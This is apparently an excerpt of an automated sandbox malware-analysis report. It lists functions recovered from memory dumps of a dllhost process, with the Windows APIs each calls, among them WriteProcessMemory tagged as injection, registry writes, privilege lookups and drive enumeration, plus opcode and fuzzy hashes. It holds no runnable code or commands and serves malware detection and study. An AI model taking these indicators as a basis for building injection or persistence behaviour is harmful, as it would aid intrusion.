
Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNELBASE ref: 0086ADA1

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: 979900d0208814c5c0345456cc327762d509f76977b722f87808bdb93d998399
Instruction ID: 5f50c3c77033536fb0a71b9664168bd53f6fe988f6683555db938389fc36de76
Opcode Fuzzy Hash: 979900d0208814c5c0345456cc327762d509f76977b722f87808bdb93d998399
Instruction Fuzzy Hash: 3821577140E3C09FD7038B258C65A92BFB4EF07220F0A84DBD985CF5A3D2296809CB72

Function 0086B662 Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0086B6D5

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 4a949bc18d8e3c6cdd495d4e8e8f79baab3d6d97b5100b97c00cedb86ad7902f
Instruction ID: 547c378a0a7a7f11e94ba081cd16d3af60364c71619ab4d243f9c00295e5e2ac
Opcode Fuzzy Hash: 4a949bc18d8e3c6cdd495d4e8e8f79baab3d6d97b5100b97c00cedb86ad7902f
Instruction Fuzzy Hash: 7221CF755042449FE720DF25CD85BA6FBE8EF08328F0884AAEE44CB281D371E944CA72

Function 0086AA52 Relevance: 1.6, APIs: 1, Instructions: 70
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,00000E24,B347177C,00000000,00000000,00000000,00000000), ref: 0086AAD1

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 5eacca8bfb3fb0b981d29ecf8412e78969f0d5c539b6ace33d735a00837ed127
Instruction ID: 133c9def222806dc1a66e93003b1978fe6bcf8d3580b19efd00f8f8dc036c1ec
Opcode Fuzzy Hash: 5eacca8bfb3fb0b981d29ecf8412e78969f0d5c539b6ace33d735a00837ed127
Instruction Fuzzy Hash: 95219276409380AFE722CF51DC44FA7BFB8EF45324F08849AE9459B152D275A508CBB2

Function 0086AF76 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,B347177C,00000000,00000000,00000000,00000000), ref: 0086AFF0

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 3190a1342a7d6fdce03ae45a5c79c65e3ad707ffde102a1408b59983588e2c03
Instruction ID: a2fab8808c8be133528c938ecd95bc9cd239db2f28ab4431b11cc4a6b2bde053
Opcode Fuzzy Hash: 3190a1342a7d6fdce03ae45a5c79c65e3ad707ffde102a1408b59983588e2c03
Instruction Fuzzy Hash: A821AEB9500604AFE721CE15CC85FA7FBECEF04714F09845AEA45DB252D770E944CAB2

Function 0086A589 Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0086A608

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 494009604e32c34f570e671c1a2e80d6078afa6081d5fc656adb63111c7b83e8
Instruction ID: e344211f0fdb29c9ce81c5c79b000319877bf032ff6ee7a310be9c4fa82e8f04
Opcode Fuzzy Hash: 494009604e32c34f570e671c1a2e80d6078afa6081d5fc656adb63111c7b83e8
Instruction Fuzzy Hash: 89218B754093C09FDB228F21DC44A92FFB4EF1B210F0D84CAE9848B163D265A949DB62

Function 0086ADE8 Relevance: 1.6, APIs: 1, Instructions: 66fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 0086AE56

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 084f3db81dc0eb30e26a2a277dd97b32adc0372a9f73f6800813671f7c396cf3
Instruction ID: 8caab104ae53386fae04601e1a7e000a51bc74a3c29dcde8da1b1d25ffc4c2f1
Opcode Fuzzy Hash: 084f3db81dc0eb30e26a2a277dd97b32adc0372a9f73f6800813671f7c396cf3
Instruction Fuzzy Hash: 962163715093805FDB11CF65DC85B93BFE8EF06620F0984AAED85DB262D225E854CB61

Function 0086B06A Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E24,B347177C,00000000,00000000,00000000,00000000), ref: 0086B0DC

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e6f1be329d81d7ac4647dd07d1eeec4f48094df850727165305ee2b0dd123bf8
Instruction ID: 1b625b82f71a4a78f6acac7673aaa86e0230cf6225806c48669a2a9a8dfe1551
Opcode Fuzzy Hash: e6f1be329d81d7ac4647dd07d1eeec4f48094df850727165305ee2b0dd123bf8
Instruction Fuzzy Hash: 8F11B175500600AFEB218E11CC85BA7FBECEF04728F04845AEE45DB252D770E844CAB2

Function 0086B1C6 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0086B22E

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 65f96571afffed07fc18b785eaa596736c97519b46bcc927ca8f2bc1be2cd2c4
Instruction ID: bb8dedd8c45142fcd693245ae5562bf39b2ba5130575692bcb3b1e67168b29aa
Opcode Fuzzy Hash: 65f96571afffed07fc18b785eaa596736c97519b46bcc927ca8f2bc1be2cd2c4
Instruction Fuzzy Hash: 7A118EB2605380AFDB21CF25DC54B57BFE8EF46620F0884AAED45CB652D265E848CB61

Function 0086AA72 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E24,B347177C,00000000,00000000,00000000,00000000), ref: 0086AAD1

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 9da3d37ee9e75ad684ef5658c65b3857c2757f16a6bcc4324058a6f3f6bcd81f
Instruction ID: 6cc1e14e2cc3a660fa2394c5876eaa39270c8c1e41d824231ae0d35e1c1f8104
Opcode Fuzzy Hash: 9da3d37ee9e75ad684ef5658c65b3857c2757f16a6bcc4324058a6f3f6bcd81f
Instruction Fuzzy Hash: C811EF75404204AFEB218F51DC84FAAFBE8EF04324F08845AEA459B252C375A404CBB2

Function 0086AE0E Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 0086AE56

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: c8cc78d70a699e312cd4a13850754f6249f77f8b5def914cfe8a79019de1ca3a
Instruction ID: b60314eb7830342b9718e04a8be059e115e3001d56046c5045456a442e1edc25
Opcode Fuzzy Hash: c8cc78d70a699e312cd4a13850754f6249f77f8b5def914cfe8a79019de1ca3a
Instruction Fuzzy Hash: 6D11A5756042408FEB54CF65DC85756FBD8EF04724F0884AAED45DB252D336E804CE72

Function 0086B1E6 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0086B22E

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c8cc78d70a699e312cd4a13850754f6249f77f8b5def914cfe8a79019de1ca3a
Instruction ID: ee2d45bdc90a146f21d7abef3a03f45199f11f1f99a8856710673a02c9cd2905
Opcode Fuzzy Hash: c8cc78d70a699e312cd4a13850754f6249f77f8b5def914cfe8a79019de1ca3a
Instruction Fuzzy Hash: CF11A1716042409FEB10CF69DC85B9AFBE8EF05724F0884AAED09CB752D735E854CA61

Function 0086AC8C Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0086ACE0

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 311b39935d7de6f86152c4fa001c4588b754aecb48d0f31f113b49e16d90704c
Instruction ID: 9bcf3f87706ab9c1f88cedeb4965a53c209ca8c38cbc847ea60b06c58399c912
Opcode Fuzzy Hash: 311b39935d7de6f86152c4fa001c4588b754aecb48d0f31f113b49e16d90704c
Instruction Fuzzy Hash: D711A1755093809FDB128F25DC85B52FFB4EF46221F0880DBED858B6A3D265A908CB62

Function 0086A8E2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E24,B347177C,00000000,00000000,00000000,00000000), ref: 0086A935

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: e180cfae189fa1a87db6288612644ba3ee28252945a5a10bad9b104c99e117ee
Instruction ID: e5d5ec5d06f5cb49f7bab8e43e154395b705efc753810d060e8f5f71d7a0b5ca
Opcode Fuzzy Hash: e180cfae189fa1a87db6288612644ba3ee28252945a5a10bad9b104c99e117ee
Instruction Fuzzy Hash: 5101C479504204AEF7108F15DC85BAAFB9CEF44724F15809AEE449B241D374A9048AA6

Function 0086A172 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0086A1C2

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 867f8207ab91b1859f97539219886287f41fa07b093a5d0ac8a717e36f155b4d
Instruction ID: c3c33e6da479585e8ee11e9ea906574e27567422ac957966e794eafcfdb5b386
Opcode Fuzzy Hash: 867f8207ab91b1859f97539219886287f41fa07b093a5d0ac8a717e36f155b4d
Instruction Fuzzy Hash: C5017171500200AFD310DF16DC45B76FBE8EB88A20F14856AED089B741D735B915CBE6

Function 0086A5C2 Relevance: 1.5, APIs: 1, Instructions: 43injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0086A608

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c200ce572f4fd94c907dbdb24dcbecc15af5f5384a5cced31acdcc28fdae5b07
Instruction ID: d7559dbf677907df6cbfaa7d8f27990be7264c38efc9cd23a4ec3c534b39060a
Opcode Fuzzy Hash: c200ce572f4fd94c907dbdb24dcbecc15af5f5384a5cced31acdcc28fdae5b07
Instruction Fuzzy Hash: 3501CC75400200CFEB20CF15D885B62FBE4FF18320F0C809AEE459B222C372E858CEA2

Function 0086ACAE Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0086ACE0

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 17437a73a632ac665dab95163b7bb29da0e6bf2c0d44a2ecec9dac7acb53f818
Instruction ID: f6e29d354894ddf3ab72b47ef50b229673e22a114b9a891f1ccd5bd5e6e91e5b
Opcode Fuzzy Hash: 17437a73a632ac665dab95163b7bb29da0e6bf2c0d44a2ecec9dac7acb53f818
Instruction Fuzzy Hash: 7B01F4355042448FEB208F15E9857A2FBE4EF04325F08C0AADD059B752D375E804CEA3

Function 0086AD72 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE ref: 0086ADA1

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: a7a04f17ca62109a3dcd6f89a412d3ae5cef901c3f2e0b2b2714e4d6e7d7cf2f
Instruction ID: ffa4f7fc5e612e0cac204f9960e7eaf0f7e96c03de6453e5c4645520d062e218
Opcode Fuzzy Hash: a7a04f17ca62109a3dcd6f89a412d3ae5cef901c3f2e0b2b2714e4d6e7d7cf2f
Instruction Fuzzy Hash: 1001DC748042448FEB10CF1AD9857A6FBE4EF04325F09C4AADD099F652D379A804CFA2

Function 04BC07C7 Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

2, xrefs: 04BC07FD

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: 3bddc7fb306b4923a71bda0b7640223b577d41d1d755ac33dabe74a6dca40e13
Instruction ID: 8ab460723b6f21144060842171a03ecf5f759938ad6682c3e831b230e5d9d67d
Opcode Fuzzy Hash: 3bddc7fb306b4923a71bda0b7640223b577d41d1d755ac33dabe74a6dca40e13
Instruction Fuzzy Hash: F65188A3D49384DFC3017BE864DD6CAFFE4DAA6208F1E449ACD849B103F1645A1B9783

Function 0086B3FC Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0086B468

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 7ca80dd98c843589404b6ad7c148887d9c6998bc583b7c38939ddf261a4e50b5
Instruction ID: cab4ab666b45a440d251f43faf7319a309b919bf84b9bc3d60ab8af1eb9ef450
Opcode Fuzzy Hash: 7ca80dd98c843589404b6ad7c148887d9c6998bc583b7c38939ddf261a4e50b5
Instruction Fuzzy Hash: 7721AEB25093C05FDB128B25DC94792BFB4EF47324F0984DAEC858F663D265A908CB62

Function 0086A63B Relevance: 1.3, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0086A6A8

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: da1762f636cacf28e346569a78c8195291c46ac61f2d82a1c80ec195b2e8478d
Instruction ID: 4a00c1c67c1468d9be27fb89b11d51621c2feaceccaaf08891bac33fa3c7cf3c
Opcode Fuzzy Hash: da1762f636cacf28e346569a78c8195291c46ac61f2d82a1c80ec195b2e8478d
Instruction Fuzzy Hash: 9A11907540D7C09FDB128B21DC85692BFB4EF07324F0A84DBDD898F163D265A949CB62

Function 0086A3C0 Relevance: 1.3, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0086A414

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ab3f6424dc4819fd309c8fc020334b4e2715345f6e81f4c2ad066d0bd4d14bc2
Instruction ID: 34ddc54c3a9c6de779b7b4acdb29c7ed3037b05270af8d17db66686cd9c3456c
Opcode Fuzzy Hash: ab3f6424dc4819fd309c8fc020334b4e2715345f6e81f4c2ad066d0bd4d14bc2
Instruction Fuzzy Hash: 3111A3715093809FDB128F25DC94B92BFB8EF46220F0884DBED85CF653D275A818CB62

Function 0086B436 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0086B468

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e163528794151f168241ac6ca286ff8affb970a682505cde7c1d76fcc6ab33ef
Instruction ID: 9cfaad5c9383f2055af37d08b652b6b55c7beef498f0d3a6267ea87b73d09506
Opcode Fuzzy Hash: e163528794151f168241ac6ca286ff8affb970a682505cde7c1d76fcc6ab33ef
Instruction Fuzzy Hash: 5B01DF759042408FEB10CF19D985792FBE8EF44328F08C4AADD09CF656D775E854CBA6

Function 0086A3E2 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0086A414

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 3bda381086a3e23f6b18e80a8266a4409734111d2bf6f1d1a0370bce4ae3b4a8
Instruction ID: 7f409e29f971ae0c95039275d279d13bb9fa53d37be800ffb27ab36abca288dc
Opcode Fuzzy Hash: 3bda381086a3e23f6b18e80a8266a4409734111d2bf6f1d1a0370bce4ae3b4a8
Instruction Fuzzy Hash: A201DF755042408FEB108F25DC897A6FBE4EF05324F08C4ABDD09DF652D6B5A814CEA2

Function 04846CF8 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

:@Ul, xrefs: 04846D0D

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul
API String ID: 0-1300287099
Opcode ID: 2f5b5894164c9d01f59c77b4e2eed7fb2efefeb396c53de895c4bb9955aaee77
Instruction ID: c9ceb86046e74555bd82c0a2894dcaeb99adb04472bf8f34e944bf7ea872dbf7
Opcode Fuzzy Hash: 2f5b5894164c9d01f59c77b4e2eed7fb2efefeb396c53de895c4bb9955aaee77
Instruction Fuzzy Hash: 09F0F430608288CFC305DB79A8155667BE5FF87A0470541E58845CB376FF752D18C361

Function 048410DE Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

|, xrefs: 0484392A

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: e6fbcf176cf13add7159b77a0223328e7d02889d1ffc131753ba61e88fc5cd6a
Instruction ID: eb37b694579f7c7db7919f1e69c86daac6dca89b2878dd83bcba9fca7ff5d0b3
Opcode Fuzzy Hash: e6fbcf176cf13add7159b77a0223328e7d02889d1ffc131753ba61e88fc5cd6a
Instruction Fuzzy Hash: C3F0CD71B0C25CCBE7104F54881436D7760AB85794F0946E6DC09D7281D7799D01CB97

Function 0086A676 Relevance: 1.3, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0086A6A8

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c39f3d15317b396587d2f3cf9b6c160b9058ac04beea143eef90b368e634d7fe
Instruction ID: 859867d6cdc12baa3c68b4b0ce589590f22a2393d35415060cf0b4230514c150
Opcode Fuzzy Hash: c39f3d15317b396587d2f3cf9b6c160b9058ac04beea143eef90b368e634d7fe
Instruction Fuzzy Hash: F4F0AF344042448FEB108F16D9857A2FBE4EF14324F0CC4DADE099B262D375E814CEA3

Function 04BC0295 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

M, xrefs: 04BC02C3

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: a15bb4592904b9ea776f5eb6c544e0452d21cc14d486b816ac929cc79f83730c
Instruction ID: 7cf33fea17b2c9e6b743152abe919bdefd1dc1b3dd8862166d571de2a7b67275
Opcode Fuzzy Hash: a15bb4592904b9ea776f5eb6c544e0452d21cc14d486b816ac929cc79f83730c
Instruction Fuzzy Hash: D0E04F70E05248CBEB04EFE9C58429DB7B2EF85304F508869D106D6244EB7859048B01

Function 04BC010A Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

K, xrefs: 04BC0136

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-856455061
Opcode ID: 9a8d0384693594dd7d8fecfe92b1826af814db1d2f92df6d8bf00b3576d0a1b2
Instruction ID: cce2cb740cdb2530b668ed2da5b86c36e3c64cb923dc85c324a91befed946653
Opcode Fuzzy Hash: 9a8d0384693594dd7d8fecfe92b1826af814db1d2f92df6d8bf00b3576d0a1b2
Instruction Fuzzy Hash: 30E08634D05209CFEB04EFF4D58429DB7B2FF80304F508869E506D7204EB3899148B05

Function 04840372 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

9, xrefs: 048456AC

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: 1e7f6d58b69348e38a955959972c285cb45986fca90443a03cbe2eaecba18078
Instruction ID: c5cd73a128721f1ac4bc83c62a7a947b43261e337faa5ee238732e2efcd0d113
Opcode Fuzzy Hash: 1e7f6d58b69348e38a955959972c285cb45986fca90443a03cbe2eaecba18078
Instruction Fuzzy Hash: CEE026B56085A8CFE7405F18841434C3790AB44394F0549D6E901C7282D6790E018F47

Function 04BC09AE Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

V, xrefs: 04BC09C6

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: 5652cad395b386b83929010642440e44cd84f5476687c667e47a0294b64a6b40
Instruction ID: 09f7534c89e87ac29f74ab217c9a9fea0fe48fb9a09d7c6213f910f8362847aa
Opcode Fuzzy Hash: 5652cad395b386b83929010642440e44cd84f5476687c667e47a0294b64a6b40
Instruction Fuzzy Hash: B9E08634905249CFEF00AFE4D59439E77B1FF45304F504459E502D7340DB785A548B06

Function 04BC037E Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

d, xrefs: 04BC03A3

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 5b21a42aedc8f603de9f469b6974d4510c1c5100654d6fc004a6558aba58f439
Instruction ID: d1952dfdcc1fd0bbd68da0d373dad767c98e70dbf87a3f6d628d26adbab123c7
Opcode Fuzzy Hash: 5b21a42aedc8f603de9f469b6974d4510c1c5100654d6fc004a6558aba58f439
Instruction Fuzzy Hash: E6D0A730A05385CBD7415B64892538C7BE19F01240F84815AC086DB341DE7908194741

Function 04BC0639 Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

/, xrefs: 04BC065E

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 10af08c44fbc06e5b461125e9ea6f3fc10f2f135da28ecc18b45eed26d643d30
Instruction ID: 8c7a63c1e8ba91b87ebb090d5f6b144d825a60e75d0a364ef7a6c34def221f10
Opcode Fuzzy Hash: 10af08c44fbc06e5b461125e9ea6f3fc10f2f135da28ecc18b45eed26d643d30
Instruction Fuzzy Hash: C2D0A73080B28A8FDB01DB7484193987FF0AF07210F9045D68092DB2A3EE38581D9701

Function 04BC0222 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

(, xrefs: 04BC0237

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 9ba32c43a0d217e48f9a156f4f8e170c1f68f5d63bde393e8b3539dcb6487050
Instruction ID: abb1137fa9fbc1214954898f7afb5d14acb9664a55ed8545a4fb1be65bc01fbe
Opcode Fuzzy Hash: 9ba32c43a0d217e48f9a156f4f8e170c1f68f5d63bde393e8b3539dcb6487050
Instruction Fuzzy Hash: 12D0C934A06248CBDF44EFE8D1982EDB7F2EB45300FA0486AE102EB345DA385E589B41

